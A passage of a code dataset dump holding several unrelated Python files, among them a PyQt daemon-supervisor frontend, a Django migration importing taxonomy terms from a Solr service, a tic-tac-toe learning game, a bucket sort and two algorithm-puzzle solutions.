client.setKwargs(kwargs)\n client.send()\n result = client.getReturnValue()\n logging.info(\"{funcName} -> {result}\".format(**locals()))\n del client\n return result\n\n\n# an interface to watch, notify, and supervise the status of xwared and ETM\nclass XwaredPy(QObject):\n statusUpdated = pyqtSignal()\n\n _etmStatus = None\n _xwaredStatus = None\n _userId = None\n _peerId = None\n _lcPort = None\n\n _t = None\n\n def __init__(self, parent):\n super().__init__(parent)\n\n app.aboutToQuit.connect(self.stopXware)\n self.startXware()\n self._t = threading.Thread(target = self._watcherThread, daemon = True,\n name = \"xwared/etm watch thread\")\n self._t.start()\n app.sigMainWinLoaded.connect(self.connectUI)\n\n @pyqtProperty(bool, notify = statusUpdated)\n def etmStatus(self):\n return self._etmStatus\n\n @pyqtProperty(bool, notify = statusUpdated)\n def xwaredStatus(self):\n return self._xwaredStatus\n\n @pyqtProperty(str, notify = statusUpdated)\n def userId(self):\n return self._userId\n\n @pyqtProperty(str, notify = statusUpdated)\n def peerId(self):\n return self._peerId\n\n @pyqtProperty(int, notify = statusUpdated)\n def lcPort(self):\n return self._lcPort\n\n def _statusUpdate(self, etmStatus, xwaredStatus, userId, peerId, lcPort):\n self._etmStatus = etmStatus\n self._xwaredStatus = xwaredStatus\n self._userId = userId\n self._peerId = peerId\n self._lcPort = lcPort\n self.statusUpdated.emit()\n\n @pyqtSlot()\n def connectUI(self):\n # Note: The menu actions enable/disable toggling are handled by statusbar.\n app.mainWin.action_ETMstart.triggered.connect(self.slotStartETM)\n app.mainWin.action_ETMstop.triggered.connect(self.slotStopETM)\n app.mainWin.action_ETMrestart.triggered.connect(self.slotRestartETM)\n\n @staticmethod\n def startXware():\n try:\n callXwaredInterface(\"start\")\n except InvalidSocket:\n pass\n\n @staticmethod\n def stopXware():\n try:\n callXwaredInterface(\"quit\")\n except InvalidSocket:\n pass\n\n @property\n def startEtmWhen(self):\n # return None if cannot get the value\n try:\n return callXwaredInterface(\"getStartEtmWhen\")\n except InvalidSocket:\n return None\n\n @startEtmWhen.setter\n def startEtmWhen(self, value):\n callXwaredInterface(\"setStartEtmWhen\", value)\n\n def _watcherThread(self):\n while True:\n try:\n backendInfo = callXwaredInterface(\"infoPoll\")\n self._statusUpdate(etmStatus = True if backendInfo.etmPid else False,\n xwaredStatus = True,\n userId = backendInfo.userId,\n peerId = backendInfo.peerId,\n lcPort = backendInfo.lcPort)\n except InvalidSocket:\n self._statusUpdate(etmStatus = False,\n xwaredStatus = False,\n userId = 0,\n peerId = \"\",\n lcPort = 0)\n\n time.sleep(1)\n\n @pyqtSlot()\n def slotStartETM(self):\n callXwaredInterface(\"startETM\")\n\n @pyqtSlot()\n def slotStopETM(self):\n callXwaredInterface(\"stopETM\")\n\n @pyqtSlot()\n def slotRestartETM(self):\n callXwaredInterface(\"restartETM\")\n\n @property\n def managedBySystemd(self):\n return os.path.lexists(constants.SYSTEMD_SERVICE_ENABLED_USERFILE) and \\\n os.path.lexists(constants.SYSTEMD_SERVICE_USERFILE)\n\n @managedBySystemd.setter\n def managedBySystemd(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.SYSTEMD_SERVICE_ENABLED_USERFILE))\n\n trySymlink(constants.SYSTEMD_SERVICE_FILE,\n constants.SYSTEMD_SERVICE_USERFILE)\n\n trySymlink(constants.SYSTEMD_SERVICE_USERFILE,\n constants.SYSTEMD_SERVICE_ENABLED_USERFILE)\n else:\n tryRemove(constants.SYSTEMD_SERVICE_ENABLED_USERFILE)\n tryRemove(constants.SYSTEMD_SERVICE_USERFILE)\n if getInitType() == InitType.SYSTEMD:\n os.system(\"systemctl --user daemon-reload\")\n\n @property\n def managedByUpstart(self):\n return os.path.lexists(constants.UPSTART_SERVICE_USERFILE)\n\n @managedByUpstart.setter\n def managedByUpstart(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.UPSTART_SERVICE_USERFILE))\n\n trySymlink(constants.UPSTART_SERVICE_FILE,\n constants.UPSTART_SERVICE_USERFILE)\n else:\n tryRemove(constants.UPSTART_SERVICE_USERFILE)\n if getInitType() == InitType.UPSTART:\n os.system(\"initctl --user reload-configuration\")\n\n @property\n def managedByAutostart(self):\n return os.path.lexists(constants.AUTOSTART_DESKTOP_USERFILE)\n\n @managedByAutostart.setter\n def managedByAutostart(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.AUTOSTART_DESKTOP_USERFILE))\n\n trySymlink(constants.AUTOSTART_DESKTOP_FILE,\n constants.AUTOSTART_DESKTOP_USERFILE)\n else:\n tryRemove(constants.AUTOSTART_DESKTOP_USERFILE)\n","sub_path":"src/frontend/xwaredpy.py","file_name":"xwaredpy.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360650629","text":"# coding: utf-8\nimport logging\n\nfrom bgrsrc import phase\nfrom bgrsrc import justwait\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef waiting(window):\n logger.debug('待ち状態')\n while True:\n phase_name = phase.getPhaseName(window)\n if phase_name is None:\n justwait.justWait(window, 5)\n continue\n else:\n logger.info('待ち状態を抜けます')\n break\n","sub_path":"bgrsrc/waitphase.py","file_name":"waitphase.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499222375","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom PyQt5.QtWidgets import QMenuBar, QAction, QMenu\n\nfrom gwid.util import GIcon\n\n\nclass GMenuBar(QMenuBar):\n\n def __init__(self, parent=None):\n QMenuBar.__init__(self, parent)\n\n self.menu_file = self.addMenu(\"File\")\n #self.menu_file.aboutToShow.connect(self.on_menu_file_about_to_show)\n self.menu_edit = self.addMenu(\"Edit\")\n self.menu_view = self.addMenu(\"View\")\n self.menu_navigate = self.addMenu(\"Navigate\")\n self.menu_window = self.addMenu(\"Window\") # type: QMenu\n\n self.menu_close_viewer = self.menu_file.addMenu(\"Close viewer\")\n self.menu_close_viewer.setIcon(GIcon.close_view())\n self.action_close_viewers = QAction(\"Close all viewers\", self)\n self.action_close_viewers.setIcon(GIcon.close_views())\n self.action_close_viewers.triggered.connect(self.on_close_all_viewers)\n self.menu_file.addAction(self.action_close_viewers)\n\n self.menu_file.addSection(\"main\")\n\n # https://bugreports.qt.io/browse/QTBUG-56276\n def on_menu_file_about_to_show(self):\n print(\"=======================\")\n for action in self.menu_file.actions():\n print(action.text())\n\n def on_close_all_viewers(self):\n for action in self.menu_close_viewer.actions():\n action.activate(QAction.Trigger)\n\n\n\n\n\n","sub_path":"gator/app/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"153302360","text":"import logging\n\nfrom django.db import migrations\nfrom django.db import transaction\nfrom tqdm import tqdm\n\nimport solr_conabio.solr_api as solr\n\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('Catálogos Taxonómicos')\n\n\nHOST = 'http://snmb.conabio.gob.mx'\nCOLLECTION = 'taxonomia'\nROWS_PER_PETITION = 1000\n\nTERM_FMT = (\n 'Term type: {type}\\n'\n ' term: {term}\\n'\n ' parents: {parents}\\n'\n ' common names: {common}\\n'\n ' synonyms: {synonyms}'\n)\nTERM_METADATA_SCHEMA = {\n \"definitions\": {},\n \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n \"$id\": \"http://example.com/term_metadata_schema.json\",\n \"type\": \"object\",\n \"title\": \"Esquema de metadatos para términos taxonómicos\",\n \"required\": [\n \"id\",\n \"version\",\n \"origin\"\n ],\n \"properties\": {\n \"id\": {\n \"$id\": \"#/properties/id\",\n \"type\": \"string\",\n \"title\": \"id\",\n \"default\": \"\",\n \"examples\": [\n \"term.id\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"version\": {\n \"$id\": \"#/properties/version\",\n \"type\": \"string\",\n \"title\": \"version\",\n \"default\": \"\",\n \"examples\": [\n \"term.version\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"origin\": {\n \"$id\": \"#/properties/origin\",\n \"type\": \"string\",\n \"title\": \"origen\",\n \"default\": \"\",\n \"examples\": [\n \"juancarlos-catálogos\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n }\n}\n\n@transaction.atomic\ndef update_database(apps, schema_editor):\n db_models = get_database_models(apps)\n data = get_all_data()\n terms = parse_data(data)\n term_pk_map = create_all_terms(terms, db_models)\n create_all_entailments(terms, term_pk_map, db_models)\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('irekua_database', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(update_database),\n ]\n\n\ndef parse_data(data):\n logger.info('Parsing data...')\n terms = {\n str(datum['id']): Term(datum)\n for datum in data\n if datum['nombre']\n }\n logger.info('done.')\n return terms\n\n\ndef get_all_data(num_rows=ROWS_PER_PETITION):\n total_rows = get_num_rows()\n\n fl = [\n 'id',\n 'categoria_taxonomica',\n 'nombre',\n 'ascendentes',\n 'nombres_comunes',\n 'subcategoria_taxonomica',\n 'sinonimos',\n 'id_asc',\n '_version_'\n ]\n\n logger.info('Getting data...')\n data = []\n for start in tqdm(range(0, total_rows, num_rows)):\n response = solr.query(HOST, COLLECTION, rows=num_rows, start=start, fl=fl)\n data += response['response']['docs']\n\n logger.info('done.')\n return data\n\n\ndef get_num_rows():\n response = solr.query(HOST, COLLECTION, rows=0)\n return response['response']['numFound']\n\n\ndef create_all_terms(all_terms, db_models):\n pk_map = {}\n\n logger.info('Creating terms...')\n for term in tqdm(all_terms.values()):\n db_term = process_term(all_terms, term, db_models)\n pk_map[term.id] = db_term\n logger.info('done')\n\n return pk_map\n\n\ndef process_term(all_terms, term, db_models):\n term_type = get_term_type(term.term_type, db_models)\n\n try:\n scope = all_terms[term.scope].term\n except KeyError:\n logger.error('No scope for {}'.format(term.scope))\n scope = None\n\n db_term = create_term(\n term_type,\n term.term,\n scope,\n term.metadata,\n db_models)\n\n if term.synonyms:\n create_synonyms(all_terms, term, db_term, db_models)\n\n if term.common_names:\n create_common_names(all_terms, term, db_term, db_models)\n\n return db_term\n\n\nTERMS = {}\ndef create_term(term_type, value, scope, metadata, db_models):\n if (term_type.name, value, scope) in TERMS:\n return TERMS[(term_type.name, value, scope)]\n\n if scope is None:\n db_term, _ = db_models.Term.objects.get_or_create(\n term_type=term_type,\n value=value,\n defaults={\n 'metadata': metadata\n }\n )\n TERMS[(term_type.name, value, scope)] = db_term\n return db_term\n\n db_term, _ = db_models.Term.objects.get_or_create(\n term_type=term_type,\n value=value,\n scope=scope,\n defaults={\n 'metadata': metadata\n })\n TERMS[(term_type.name, value, scope)] = db_term\n return db_term\n\n\ndef create_common_names(all_terms, term, db_term, db_models):\n common_name_type = get_term_type('nombre común', db_models)\n\n try:\n scope = all_terms[term.scope].term\n except KeyError:\n logger.error('No scope for term {}'.format(term.scope))\n scope = None\n\n for common_name in term.common_names:\n common_name_term = create_term(\n common_name_type,\n common_name,\n scope,\n term.metadata,\n db_models)\n term.common_names_terms[common_name_term.pk] = common_name_term\n create_entailment(common_name_term, db_term, db_models)\n\n\nTERM_TYPES = {}\ndef get_term_type(term_type, db_models):\n if term_type not in TERM_TYPES:\n db_term_type, _ = db_models.TermType.objects.get_or_create(\n name=term_type,\n defaults={\n 'description': 'Nivel taxonómico: {}'.format(term_type),\n 'is_categorical': True,\n 'metadata_schema': TERM_METADATA_SCHEMA,\n 'synonym_metadata_schema': TERM_METADATA_SCHEMA\n }\n )\n TERM_TYPES[term_type] = db_term_type\n return db_term_type\n\n return TERM_TYPES[term_type]\n\n\ndef create_synonyms(all_terms, term, db_term, db_models):\n term_type = db_term.term_type\n\n try:\n scope = all_terms[term.scope].term\n except KeyError:\n logger.error('No scope for term {}'.format(term.scope))\n scope = None\n\n for synonym in term.synonyms:\n synonym_term = create_term(\n term_type,\n synonym,\n scope,\n term.metadata,\n db_models)\n term.synonyms_terms[synonym_term.pk] = synonym_term\n synonym, _ = create_synonym(synonym_term, db_term, term.metadata, db_models)\n\n\ndef create_synonym(source, target, metadata, db_models):\n return db_models.Synonym.objects.get_or_create(\n source=source,\n target=target,\n defaults={\n 'metadata': metadata\n }\n )\n\n\ndef create_all_entailments(terms, mapping, db_models):\n logger.info('Creating entailments...')\n for term in tqdm(terms.values()):\n create_term_entailments(term, mapping, db_models)\n logger.info('done.')\n\n\ndef create_term_entailments(term, mapping, db_models):\n db_term = mapping[term.id]\n\n for parent_id in term.parents:\n try:\n parent_term = mapping[parent_id]\n create_entailment(db_term, parent_term, db_models)\n\n for synonym in term.synonyms_terms.values():\n create_entailment(synonym, parent_term, db_models)\n\n for common_name in term.common_names_terms.values():\n create_entailment(common_name, parent_term, db_models)\n except KeyError:\n pass\n\n\n\ndef create_entailment(source, target, db_models):\n check_entailment_type(source, target, db_models)\n return db_models.Entailment.objects.get_or_create(\n source=source,\n target=target)\n\n\nENTAILMENT_TYPES = {}\ndef check_entailment_type(source, target, db_models):\n label = (source.term_type.pk, target.term_type.pk)\n\n if label not in ENTAILMENT_TYPES:\n entailment_type, _ = db_models.EntailmentType.objects.get_or_create(\n source_type=source.term_type,\n target_type=target.term_type)\n ENTAILMENT_TYPES[label] = entailment_type\n\n return ENTAILMENT_TYPES[label]\n\n\ndef get_database_models(apps):\n class DBModels(object):\n def __init__(self, apps):\n self.EntailmentType = apps.get_model('irekua_database', 'EntailmentType')\n self.Entailment = apps.get_model('irekua_database', 'Entailment')\n self.Term = apps.get_model('irekua_database', 'Term')\n self.TermType = apps.get_model('irekua_database', 'TermType')\n self.Synonym = apps.get_model('irekua_database', 'Synonym')\n\n return DBModels(apps)\n\n\nclass Term(object):\n def __init__(self, data):\n self.id = str(data['id'])\n\n try:\n self.term_type = data['subcategoria_taxonomica']\n except KeyError:\n try:\n self.term_type = data['categoria_taxonomica']\n except KeyError:\n self.term_type = None\n logger.error('No term type for {}'.format(data))\n\n self.term = data['nombre']\n self.version = data['_version_']\n\n self.common_names = data.get('nombres_comunes', [])\n self.synonyms = data.get('sinonimos', [])\n self.scope = str(data.get('id_asc', ''))\n\n self.parents = [\n str(sid) for sid in data['ascendentes'].split(',')\n if str(sid) != str(self.id)\n ]\n\n self.parents_terms = {}\n self.synonyms_terms = {}\n self.common_names_terms = {}\n\n @property\n def metadata(self):\n return {\n 'id': str(self.id),\n 'version': str(self.version),\n 'origin': 'juancarlos-catálogos'\n }\n\n def __str__(self):\n return TERM_FMT.format(\n type=self.term_type,\n term=self.term,\n parents=str(self.parents),\n common=str(self.common_names),\n synonyms=str(self.synonyms))\n\n def __repr__(self):\n return str(self)\n","sub_path":"conabio_irekua_migrations/migrations/catalogos_taxonomicos_conabio.py","file_name":"catalogos_taxonomicos_conabio.py","file_ext":"py","file_size_in_byte":9859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425320886","text":"# change the name\nclass qbeOutput:\n def __init__(self, start_time):\n self.start_time = start_time.strftime('%Y-%m-%d %H:%M:%S')\n self.end_time = '2021-05-14 10:31:00'\n self.file = []\n self.output_file= []\n self.msg = []\n # change the following field to fulfilled the requirement\n self.currmb=0\n self.precon=0\n self.acbmb=0\n self.actmb_actn= []\n self.actmb_currto= []\n self.pec= []\n def addfile(self,file_name,count):\n file_dict = {'file_name': file_name,'count':count}\n self.file.append(file_dict)\n def add_msg(self,msg):\n self.msg.append(msg)\nclass qbeOutputToTemplate:\n def __init__(self, qbe_output):\n self.start_time = qbe_output.start_time\n self.end_time= qbe_output.end_time\n self.file = self.get_file(qbe_output.file)\n self.output_file= self.get_output_file(qbe_output.output_file)\n self.msg= self.get_msg(qbe_output.msg)\n # change the following field to fulfilled the requirement\n self.currmb = qbe_output.currmb\n self.precon = qbe_output.precon\n self.acbmb = qbe_output.acbmb\n self.actmb_actn = self.get_actmb_actn(qbe_output.actmb_actn)\n self.actmb_currto = self.get_actmb_currto(qbe_output.actmb_currto)\n self.pec = self.get_pec(qbe_output.pec)\n\n def get_file(self,file):\n result = ''\n for val in file:\n result += val['file_name']+'(' + str(val['count']) + ')\\n'\n return result\n\n def get_output_file(self, output_file):\n result = ''\n for val in output_file:\n result += val +'\\n'\n return result\n\n def get_msg(self, msg):\n result = ''\n for val in msg:\n result += val +'\\n'\n return result\n# delete the following field to fulfilled the requirement\n def get_pec(self, pec):\n result = ''\n for val in pec:\n result += val +'\\n'\n return result\n\n def get_actmb_actn(self,actmb_actn):\n result = ''\n for val in actmb_actn:\n result += val['ACTN']+'(' + str(val['COUNT']) + ')\\n'\n return result\n \n def get_actmb_currto(self,actmb_currto):\n result = ''\n for val in actmb_currto:\n result += val['CURRTO'].strftime('%Y%m%d')+'(' + str(val['COUNT']) + ')\\n'\n return result","sub_path":"qbe_output.py","file_name":"qbe_output.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23092164","text":"import pickle\nimport random\nimport tkinter as tk\nfrom tkinter import font\nfrom collections import Counter\nfirstrun = 1\n\n#Tkinter GUI\nclass GUI2:\n def __init__(self):\n self.move_no = 0\n\n self.obj_names = []\n self.Temp_obj_list = []\n try:\n with open('dictO.pkl', 'rb') as file:\n self.Menace_obj_list = pickle.load(file)\n except:\n self.Menace_obj_list = {}\n\n self.mv = 3\n self.board = tk.Tk()\n self.proBoard = tk.Tk()\n self.proBoard.title(\"Probability of earlier move\")\n self.board.title(\"Tic-Tac-Toe\")\n self.buttons = []\n self.proButtons = []\n self.font1 = font.Font(size=36)\n #Create buttons\n for x in range(0, 3):\n for y in range(0, 3):\n b = tk.Button(self.board, height=2, width=6, text='', font=self.font1)\n b.config(command=lambda widget=b: self.callProg(widget))\n b.grid(row=x, column=y)\n b.position = (x, y)\n self.buttons.append(b)\n\n p = tk.Button(self.proBoard, height=4, width=12, text='', font=self.font1)\n p.grid(row=x, column=y)\n p.position = (x, y)\n self.proButtons.append(p)\n\n self.b1 = tk.Button(self.board, height=1, width=6, text='Exit', font=self.font1)\n self.b1.config(command=lambda: self.Destroy())\n self.b1.grid(row=3, column=0)\n\n self.TextBox = tk.Label(self.board, text=\"\",font = self.font1)\n self.TextBox.grid(row = 3, column = 2)\n self.Runprog()\n self.board.mainloop()\n\n def callProg(self,widget):\n k = self.on_click(widget)\n if k==0:\n self.Runprog()\n\n def Invalid_Moves(self):\n invalid_m = []\n for x in range(0, 9):\n if self.buttons[x][\"text\"] == \"X\" or self.buttons[x][\"text\"] == \"O\":\n invalid_m.append(x)\n return invalid_m\n\n def Disp_Probab(self,ll):\n ct = Counter(ll)\n for x in range(9):\n try:\n perc = str((ct[x]/len(ll))*100)+\"0000\"\n perc = perc[:4]\n self.proButtons[x][\"text\"] = perc + \" %\"\n except:\n self.proButtons[x][\"text\"] = \"0 %\"\n \n def on_click(self, widget):\n r, c = widget.position\n convert = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]\n num = convert[r][c]\n iv = self.Invalid_Moves()\n if num not in iv:\n self.move_no += 1\n else:\n return -1\n if num not in iv and self.mv % 2 != 0:\n self.buttons[num][\"text\"] = \"X\"\n self.mv = 2\n self.obj_names.append(str(num))\n check = self.Invalid_Moves()\n check2 = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n Check_if_Won = self.Has_Won()\n if check != check2 and Check_if_Won == \"Continue\":\n return 0\n if Check_if_Won == \"O\":\n self.GUI2_win()\n elif Check_if_Won == \"X\":\n self.GUI2_loss()\n elif Check_if_Won == \"Draw\":\n self.GUI2_draw()\n\n def Menace_click(self, Menace_obj):\n click = Menace_obj.r_select()\n self.Disp_Probab(Menace_obj.probab)\n #Print probability\n if click == -1:\n self.GUI2_loss()\n else:\n invalid_m = self.Invalid_Moves()\n if click not in invalid_m and self.mv % 2 != 1:\n self.buttons[click][\"text\"] = \"O\"\n self.mv = 3\n self.obj_names.append(str(click))\n Check_if_Won = self.Has_Won()\n if Check_if_Won == \"O\":\n self.GUI2_win()\n elif Check_if_Won == \"X\":\n self.GUI2_loss()\n elif Check_if_Won == \"Draw\":\n self.GUI2_draw()\n\n def Runprog(self):\n global firstrun\n if firstrun == 1:\n firstrun=0\n else:\n self.move_no+=1\n listX = []\n listO = []\n listAll = []\n for x in range(0, 9):\n if self.buttons[x][\"text\"] == \"X\":\n listX.append(x)\n elif self.buttons[x][\"text\"] == \"O\":\n listO.append(x)\n listAll = listO + listX\n\n name = \"\"\n name = ''.join(self.obj_names)\n name = \"_\" + name\n if self.mv % 2 == 0:\n if name not in self.Menace_obj_list:\n # print(self.move_no)\n M_obj = MENACE2(listAll, self.move_no)\n self.Menace_obj_list[name] = M_obj\n self.Temp_obj_list.append(self.Menace_obj_list[name])\n self.Menace_click(self.Menace_obj_list[name])\n\n else:\n self.Temp_obj_list.append(self.Menace_obj_list[name])\n self.Menace_click(self.Menace_obj_list[name])\n\n def reset(self):\n global firstrun\n firstrun = 1\n self.TextBox[\"text\"] = \"\"\n for x in range(0, 9):\n self.buttons[x][\"text\"] = ''\n self.obj_names = []\n self.move_no = 0\n self.mv = 1\n self.Runprog()\n\n def GUI2_win(self):\n self.TextBox[\"text\"] = \"You Lose\"\n for x in self.Temp_obj_list:\n x.win()\n self.Temp_obj_list = []\n print(\"Win call\")\n self.mv = 3\n self.board.after(1500, lambda: self.reset())\n\n def GUI2_draw(self):\n self.TextBox[\"text\"] = \"Draw\"\n for x in self.Temp_obj_list:\n x.draw()\n self.Temp_obj_list = []\n print(\"Draw call\")\n self.mv = 3\n self.board.after(1500, lambda: self.reset())\n\n def GUI2_loss(self):\n self.TextBox[\"text\"] = \"You Win\"\n for x in self.Temp_obj_list:\n x.loss()\n self.Temp_obj_list = []\n print(\"Loss call\")\n self.mv = 3\n self.board.after(1500, lambda: self.reset())\n\n def Has_Won(self):\n # Horizontal\n for x in range(0, 7, 3):\n if self.buttons[x][\"text\"] == self.buttons[x + 1][\"text\"] == self.buttons[x + 2][\"text\"] == \"X\":\n return \"X\"\n elif self.buttons[x][\"text\"] == self.buttons[x + 1][\"text\"] == self.buttons[x + 2][\"text\"] == \"O\":\n return \"O\"\n # Vertical\n for x in range(0, 3):\n if self.buttons[x][\"text\"] == self.buttons[x + 3][\"text\"] == self.buttons[x + 6][\"text\"] == \"X\":\n return \"X\"\n elif self.buttons[x][\"text\"] == self.buttons[x + 3][\"text\"] == self.buttons[x + 6][\"text\"] == \"O\":\n return \"O\"\n # Diagonal\n if self.buttons[0][\"text\"] == self.buttons[4][\"text\"] == self.buttons[8][\"text\"] == \"X\":\n return \"X\"\n elif self.buttons[0][\"text\"] == self.buttons[4][\"text\"] == self.buttons[8][\"text\"] == \"O\":\n return \"O\"\n elif self.buttons[2][\"text\"] == self.buttons[4][\"text\"] == self.buttons[6][\"text\"] == \"X\":\n return \"X\"\n elif self.buttons[2][\"text\"] == self.buttons[4][\"text\"] == self.buttons[6][\"text\"] == \"O\":\n return \"O\"\n # Draw\n inv = self.Invalid_Moves()\n invcheck = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n if invcheck == inv:\n return \"Draw\"\n return \"Continue\"\n\n def Destroy(self):\n with open('dictO.pkl', 'wb') as file:\n pickle.dump(self.Menace_obj_list, file)\n self.board.destroy()\n\n#Store all the gamestates and its probabilities\nclass MENACE2:\n def __init__(self, prob, mv_no):\n self.buffer = 100\n self.mv = mv_no\n if mv_no == 2:\n self.l1 = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3,\n 4, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7,\n 8, 8, 8, 8, 8, 8, 8, 8]\n elif mv_no == 4:\n self.l1 = [0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7,\n 8, 8, 8, 8]\n elif mv_no == 6:\n self.l1 = [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8]\n elif mv_no == 8:\n self.l1 = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n else:\n self.l1 = [0,1,2,3,4,5,6,7,8]\n print(mv_no,\"Fail\")\n try:\n self.probab = [x for x in self.l1 if x not in prob]\n except:\n print(mv_no, \"_________________________________________________\")\n\n def __repr__(self):\n k = '['\n for x in self.l1:\n k = k + str(x) + \", \"\n k = k[:len(k) - 2]\n k = k + ']'\n return k\n\n def r_select(self):\n try:\n new_cell = random.choice(self.probab)\n self.buffer = new_cell\n #print(self.probab)\n return new_cell\n except:\n model = [0,1,2,3,4,5,6,7,8]\n if self.mv < 8:\n k = [x for x in model if x not in self.prob]\n print(\"Random Invoked\")\n self.buffer = random.choice(k)\n return self.buffer\n return -1\n\n def loss(self):\n try:\n self.probab.remove(self.buffer)\n except:\n pass\n\n def win(self):\n for x in range(0, 3):\n self.probab.append(self.buffer)\n\n def draw(self):\n self.probab.append(self.buffer)\n\n# pprint.pprint(Menace_obj_list, stream=None, indent=3, width=80, depth=None)\n#W=GUI2()\n","sub_path":"_O.py","file_name":"_O.py","file_ext":"py","file_size_in_byte":9471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70254835","text":"# ====================================\n# Radix Sort Python implementation\n# Author: lv10\n# ====================================\n\nimport collections\n\n# A list of integers is defined\nseq = [123, 312, 214, 470, 652, 511, 911, 999, 199, 180, 456,\n 100, 970, 690, 520, 111, 520, 509, 511, 432, 227, 119]\n\n\ndef bucket_sort(seq, idx):\n\n while idx >= 0:\n bucket = dict()\n\n for nbr in seq:\n key = int(str(nbr)[idx])\n if not bucket.get(key):\n bucket[key] = [nbr]\n else:\n bucket[key].append(nbr)\n\n # sort the dictionary by keys to get the dict values in the right order\n ordered_bucket = collections.OrderedDict(sorted(bucket.items()))\n\n seq = []\n\n for item in ordered_bucket.values():\n seq += item\n\n idx -= 1\n\n return seq\n\n\ndef bucket_sort_recursive(seq, idx):\n\n \"\"\"\n Tail Recursive solution\n \"\"\"\n\n if idx < 0:\n return seq\n\n bucket = dict()\n\n for nbr in seq:\n key = int(str(nbr)[idx])\n if not bucket.get(key):\n bucket[key] = [nbr]\n else:\n bucket[key].append(nbr)\n\n # order the dictionary by key\n ordered_bucket = collections.OrderedDict(sorted(bucket.items()))\n\n seq = list()\n for item in ordered_bucket.values():\n seq += item\n\n return bucket_sort_recursive(seq, idx-1)\n\n\nassert bucket_sort(seq, 2) == sorted(seq)\nassert bucket_sort_recursive(seq, 2) == sorted(seq)\nassert bucket_sort(seq, 2) == bucket_sort_recursive(seq, 2)\n","sub_path":"algos/bucket_sort/bucket_sort.py","file_name":"bucket_sort.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"111177618","text":"# coding=utf-8\n# Time: 2019-11-21-17:37 \n# Author: dongshichao\n\n'''\n139. 单词拆分\n\n给定一个非空字符串 s 和一个包含非空单词列表的字典 wordDict,判定 s 是否可以被空格拆分为一个或多个在字典中出现的单词。\n\n说明:\n\n拆分时可以重复使用字典中的单词。\n你可以假设字典中没有重复的单词。\n示例 1:\n\n输入: s = \"leetcode\", wordDict = [\"leet\", \"code\"]\n输出: true\n解释: 返回 true 因为 \"leetcode\" 可以被拆分成 \"leet code\"。\n\n'''\n\nclass Solution(object):\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: List[str]\n :rtype: bool\n \"\"\"\n n = len(s)\n\n dp = [False for _ in range(n)]\n # dp[i]表示 以s[i] 结尾的子字符串是否可以拆分一个活多个在字典中出现的单词\n\n dp[0] = s[0] in wordDict\n\n for r in range(1,n):\n if s[:r+1] in wordDict:\n dp[r] = True\n continue\n\n for l in range(r):\n if dp[l] and s[l+1:r+1] in wordDict:\n dp[r] = True\n break\n\n return dp[-1]\n\n","sub_path":"list/wordBreak.py","file_name":"wordBreak.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130825000","text":"from datetime import time\r\nfrom django.db import models\r\nfrom django.utils import timezone\r\n\r\nclass Table1(models.Model):\r\n reference_id = models.IntegerField(primary_key=True, default=0)\r\n api = models.CharField(max_length=16)\r\n\r\n\r\nclass Data(models.Model):\r\n api_key = models.ForeignKey(Table1, on_delete=models.CASCADE)\r\n temparature = models.FloatField(default=0)\r\n humidity = models.FloatField(default=0)\r\n dat = models.DateField(default=timezone.now)\r\n tim = models.TimeField(default= timezone.now)\r\n","sub_path":"Sensing/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221382252","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val, prev, next, child):\n self.val = val\n self.prev = prev\n self.next = next\n self.child = child\n\"\"\"\nfrom collections import deque\nclass Solution:\n def flatten(self, head: 'Node') -> 'Node':\n queue = []\n dummy = Node(None, None, None, None)\n dummy.next = head\n pointer = dummy\n \n while pointer:\n if pointer.child:\n if pointer.next:\n queue.append(pointer.next)\n pointer.next = pointer.child\n pointer.next.prev = pointer\n pointer.child = None\n # print(pointer.val,len(queue))\n if not pointer.next and len(queue) > 0:\n pointer.next = queue.pop()\n 